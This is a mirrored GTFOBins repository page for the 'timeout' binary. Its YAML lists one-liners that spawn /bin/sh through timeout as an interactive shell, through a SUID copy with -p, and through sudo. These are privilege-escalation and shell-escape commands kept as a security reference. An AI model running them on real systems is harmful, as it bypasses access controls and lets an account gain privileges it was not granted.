1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 10:53:35 +02:00
GTFOBins.github.io/_gtfobins/timeout.md
2018-07-16 15:01:50 +02:00

10 lines
190 B
Markdown

---
functions:
execute-interactive:
- code: timeout 7d /bin/sh
suid-enabled:
- code: ./timeout 7d /bin/sh -p
sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh
---